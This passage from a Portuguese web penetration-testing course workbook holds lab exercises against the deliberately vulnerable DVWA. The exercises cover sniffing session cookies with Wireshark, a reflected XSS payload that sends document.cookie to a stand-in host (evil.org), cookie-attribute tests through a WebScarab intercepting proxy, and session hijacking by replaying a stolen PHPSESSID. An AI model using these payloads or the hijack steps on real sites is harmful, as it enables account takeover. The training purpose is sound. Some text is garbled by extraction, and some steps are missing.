O objetivo deste exercício é capturar o identificador de sessão, por meio da escuta dos pacotes de rede, em um cenário em que nenhuma proteção é utilizada no transporte de informações.
1. Inicie o Firefox, presente no menu Aplicativos\Internet.
2. Inicie o Wireshark, presente no menu Aplicativos\Curso – Ferramentas. Para conseguir cap- turar os pacotes, a aplicação deve ser executada em modo privilegiado e, por isso, uma senha será solicitada. Digite “esruser” e clique em Ok.
3. Clique no primeiro ícone da barra de ferramentas, para listar as interfaces de rede dis- poníveis para captura. Na caixa de diálogo que aparece, clique em Options da linha eth1. Em seguida, no campo Capture filter, digite “tcp port http” e clique em Start, para iniciar a captura de pacotes.
4. Acesse com o Firefox o DVWA, a partir da barra de atalhos.
5. Pare a captura de pacotes no Wireshark, clicando no quarto botão da barra de ferra- mentas (Stop the running live capture).
6. Procure pela linha contendo HTTP/1.1 302 Found e a selecione.
7. Na segunda parte da tela, expanda o item Hypertext Transfer Protocol e procure pelo cabeçalho Set-Cookie. Observe que o cookie PHPSESSID é transmitido em claro.
8. Encerre o Wireshark e o Firefox.
Manipulação de identificador de sessão por meio de scripts
Neste exercício, o aluno acessará o identificador de sessão por meio de scripts no lado cliente da aplicação.
1. Inicie o Firefox, presente no menu Aplicativos\Internet.
2. Acesse o DVWA, a partir da barra de atalhos.
3. Forneça para os campos Username e Password, respectivamente, os valores “admin” e “password”, para se autenticar no sistema.
4. No menu de opções, clique em XSS reflected.
5. Digite no campo What’s your name o valor:
<script>alert(document.cookie)</script>
6. Clique em Submit e veja a caixa de mensagem exibida.
7. Clique em Ok.
8. Digite no campo What’s your name o valor:
<script>document.write(‘<img src=”http://www.evil.org/?SID=’+
8
document.cookie+© "/>© )</script>9. Clique em Submit.
10. Pressione Ctrl + N, para abrir uma nova janela do Firefox.
Te st e d e I nv as ão d e A pl ic aç õe s W eb
12. Procure o registro da requisição realizada pelo elemento <img> injetado no passo 8. O valor do cookie é o mesmo que o identificado no passo 5?
13. Encerre o Firefox.
Atributos de cookies
O propósito deste exercício é fixar os conceitos sobre os atributos que podem ser utilizados por cookies e o impacto que têm em segurança.
1. Inicie o WebScarab, presente no menu Aplicativos\Curso – Ferramentas.
2. Clique na aba Proxy, depois em Manual Edit e, por fim, desmarque a opção Intercept requests.
3. Inicie o Firefox, presente no menu Aplicativos\Internet.
4. No Firefox, clique no Multiproxy Switch, na barra de estado, e selecione o WebScarab.
5. Acesse https://cookies.esr.rnp.br/. O Firefox exibe uma mensagem de erro, porque o WebScarab realiza um man-in-the-middle, para conseguir interceptar o tráfego HTTPS.
6. Clique em I Understand the Risks.
7. Clique em Add Exception.
8. Desmarque Permanently store this exception e clique em Confirm Security Exception.
9. Clique no link Atributo secure.
10. No WebScarab, clique na aba Summary e role a janela até a coluna Set-Cookie. Veja que um cookie ESRSID foi definido.
11. Retorne ao Firefox e clique em Acesso via HTTPS.
12. No WebScarab, veja que o cookie ESRSID foi enviado.
13. No Firefox, retorne à página anterior e clique em Acesso via HTTP.
14. Verifique, no WebScarab, que o cookie não foi enviado, porque o navegador honrou o atributo secure.
15. Retorne duas páginas no Firefox, para acessar novamente a página inicial.
16. Clique no link Atributo HttpOnly.
17. Veja no WebScarab que um novo cookie, ESRSIDHO, foi definido.
18. Retorne ao Firefox e clique em Ler Cookie. Os dois cookies são exibidos?
19. Clique em Criar Novo Cookie e, depois, novamente em Ler Cookie. Veja que um cookie foi adicionado.
20. Acesse o menu Tools e clique em Cookie editor. Veja que há dois cookies com o nome ESRSIDHO e encerre a janela do complemento.
21. Pressione Alt +[Seta para esquerda], para retornar à página anterior.
22. Clique no link Atributo Domain.
23. Veja, por meio do Add N Edit Cookie, que um novo cookie, “ESRSIDDO”, foi definido.
Ca pí tu lo 4 - R ot ei ro d e A tiv id ad es
25. Veja no WebScarab que o cookie ESRSIDDO foi enviado.
26. No Firefox, retorne à página anterior e clique em Domínio other.rnp.br.
27. Veja pela mensagem de erro que nenhum cookie foi enviado pelo navegador.
28. Pressione Alt +[Seta para esquerda] duas vezes.
29. Clique no link Atributo Path.
30. Veja, por meio do Add N Edit Cookie, que um novo cookie, ESRSIDPA, foi definido.
31. Clique no link Subdiretório da pasta path.
32. No WebScarab, veja que o cookie ESRSIDPA foi enviado.
33. No Firefox, retorne à página anterior e clique em Outro diretório.
34. Veja no WebScarab que o cookie ESRSIDPA não foi enviado.
35. Encerre o WebScarab.
36. No Firefox, clique no Multiproxy Switch, na barra de estado, e selecione None.
37. Encerre o Firefox.
Sequestro de sessão
Uma vez descoberto o identificador de uma sessão válida, o próximo passo consiste no sequestro dessa sessão. Neste exercício, o leitor verá como isso pode ser realizado.
1. Inicie o Google Chrome, presente no menu Aplicativos\Curso – Ferramentas.
2. Inicie o Wireshark, presente no menu Aplicativos\Curso – Ferramentas. Para conseguir cap- turar os pacotes, a aplicação deve ser executada em modo privilegiado e, por isso, uma senha será solicitada. Digite “esruser” e clique em Ok.
3. Clique no primeiro ícone da barra de ferramentas para listar as interfaces de rede dis- poníveis para captura. Na caixa de diálogo que aparece, clique em Options da linha eth1. Em seguida, no campo Capture filter, digite “tcp port http” e clique em Start, para iniciar a captura de pacotes.
4. Retorne ao Google Chrome e acesse http://dvwa.esr.rnp.br
5. Autentique-se fornecendo “admin” e “password” para os campos Username e Password, respectivamente.
6. No Wireshark, procure pelo último GET e anote o PHPSESSID.
7. Inicie o Firefox, presente no menu Aplicativos\Curso – Ferramentas.
8. Acesse o DVWA, digitando a URL:
http://dvwa.esr.rnp.br/vulnerabilities/xss_r/ Veja que a aplicação o redireciona para a tela de autenticação.
9. Clique no menu Tools e em Cookie Editor.
10. Selecione o cookie PHPSESSID definido para o domínio dvwa.esr.rnp.br e clique em Edit.
11. Altere o campo Content para o valor anotado no passo 6 e clique em Save.
Te st e d e I nv as ão d e A pl ic aç õe s W eb
13. Encerre o Wireshark, o Google Chrome e o Firefox.